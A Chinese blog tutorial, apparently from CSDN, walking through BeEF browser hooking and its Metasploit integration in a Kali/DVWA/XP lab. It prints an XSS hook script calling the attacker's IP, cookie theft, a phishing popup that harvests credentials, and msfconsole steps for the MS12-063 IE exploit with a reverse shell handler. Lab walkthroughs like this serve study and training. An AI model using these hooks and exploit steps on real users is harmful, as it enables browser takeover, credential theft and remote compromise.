- 1软件测试工程师--面试题_uftuif
- 2用Python 开发植物大战僵尸游戏_python中怎么做植物大战僵尸
- 3在MAC系统中使用mysql,出现mysql: command not found的情况_command not found: mysql
- 4【点云论文速读】6D位姿估计
- 5共识问题:区块链如何确认记账权?_区块链候选记账权
- 6python sys os time random模块_pycharm安装sys os time 模块
- 7Git重修系列 ------ Git的使用和常用命令总结
- 8uniapp tabBar角标问题_uniapp再tabbar上添加动态的数字角标
- 915个超实用Python文本处理案例分享,快点码住!_python关于文件经典例子
- 10auditd 用户审计详解
Kali BeEF MSF的使用
赞
踩
0x00 BeEF
BeEF( The Browser Exploitation Framework) 是由Wade Alcorn 在2006年开始创建的,是由ruby语言开发的专门针对浏览器攻击的框架。BeeF是前欧美最流行的web框架攻击平台,kali 集成BeEf,而且BeEf有很多好使的payload。例如BeEF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机。
不过在目前,BeEF使用的人比较少,并且在新版Kali中已经没有默认安装了,这里简单记录下BeEF的使用。
测试环境:任意存在XSS漏洞的站点及kali2019;
注意如果是在新版kali中则可以使用apt-get install beef-xss进行安装。
0x02 BeEF的使用
直接在命令行输入xss-beef即可使用,我这里多了一个提示,需要改变缺省密码,它的缺省密码是beef/beef。
当程序启动完毕后,会自动打开浏览器,出现登陆界面。
当然也可以根据之前的Log信息进行操作,上面也有写登陆的地址,直接登陆这个地址也是可以的。
接下来,将上面的Hook打入到XSS漏洞环境中,这里要记得将<IP>换成kali的IP地址,这里拿都知道的DVWA靶场举例。
<script src="http://192.168.181.141:3000/hook.js"></script>
- 1
直接插进去就行了。
然后登陆beef查看上线主机。
点击上线主机后,可以看到一些对应的信息。
点击command可以看到支持的攻击模块
这里由于软件有较久没有更新模块内容,所以有些功能可能无法使用的,可以通过命令前面的颜色来判断
- 绿色:命令模块可以在目标浏览器上运行,且用户不会感到任何异常
- 橙色:命令模块可以在目标浏览器上运行,但是用户可能会感到异常(比如可能会有弹窗,提示,跳转 等)
- 灰色:命令模块尚未针对此目标进行验证,即不知道能否可运行
- 红色:命令模块不适用于此目标
这里拿Browser举例。
使用绿色的Get Cookie
点击Execute可以看到对应的信息
再拿橙色的Redirect Browser举例
点击Execute后用户界面会跳转到百度。
显示命令执行成功,查看客户端页面。
已经跳转成功,还可以使用社工模块中的弹窗等。
别说,还挺像的。。
输入后,可以在后台收到用户名密码信息
另外BeEF还可以联动MSF一起使用,不过具体功能还得大家自行研究了,这里贴下联动的方法。
0x03 MSF+BeEF
首先更改BeEF的第一个配置文件,开启MSF的加载模块。
vim /usr/share/beef-xss/config.yaml
- 1
另外需要修改扩展模块中的MSF配置文件
vim /usr/share/beef-xss/extensions/metasploit/config.yaml
- 1
保证红框内的配置即可,接着进MSF加载模块
load msgrpc ServerHost=127.0.0.1 User=msf Pass=abc123
- 1
这里区分大小写,密码在刚刚的配置文件里面有
最后一步,去beef-xss目录下通过./xss-beef启动才行。
cd /usr/share/beef-xss/
./beef
- 1
- 2
再次登陆BeEF就可以看到已经加载了MSF模块了。
这里就可以通过加载好的msf模块直接打了,不过找了一圈也没看到可以直接利用的。。。这大概就是不香了的原因吧,最后换个机器xp玩一下。
0x04 MSF+BeEF实例
MSF使用MS12-063漏洞,配合BeEF完成getshell
由于MS12-063针对IE7/8/9有效果,这里客户机用XP测试,哎,用这么老的机器测试就是玩。
XP访问存储型XSS上线至BeEF。
接着选择msf模块中的ms12-063命令模块,填入对应的payload
直接执行,本以为完事了,结果。。。
一直loading,shell拿到,没办法只能去msf中玩了。
#后来想了下也测试过了,其实这里还是去`rediresct brower`那里去控制客户端访问一次生成的页面就可以了。
#比如这里需要让他访问http://192.168.181.141:8888,才能正常上线
#而且正常上线后,这个地方还是会loading,也得去msf中才能看到shell,感觉没啥意义。。。
- 1
- 2
- 3
msf6 > search ms12-063
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/browser/ie_execcommand_uaf 2012-09-14 good No MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
接着进入模块后进行设置
msf6 > use exploit/windows/browser/ie_execcommand_uaf
msf6 exploit(windows/browser/ie_execcommand_uaf) > set uripath /
uripath => /
msf6 exploit(windows/browser/ie_execcommand_uaf) > exploit
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.181.141:4445
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.181.141:8080/
[*] Server started.
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
接着在BeEF中使用Redirect Brower功能让客户机访问http://192.168.181.141:8080/。
再去看MSF,就上线了。
0x05 闲语
没想到上周临时的想法试着去申请下博客专家,今天就收到消息,来了来了,CSDN认证博客专家,GOT it,新的开始,继续加油!
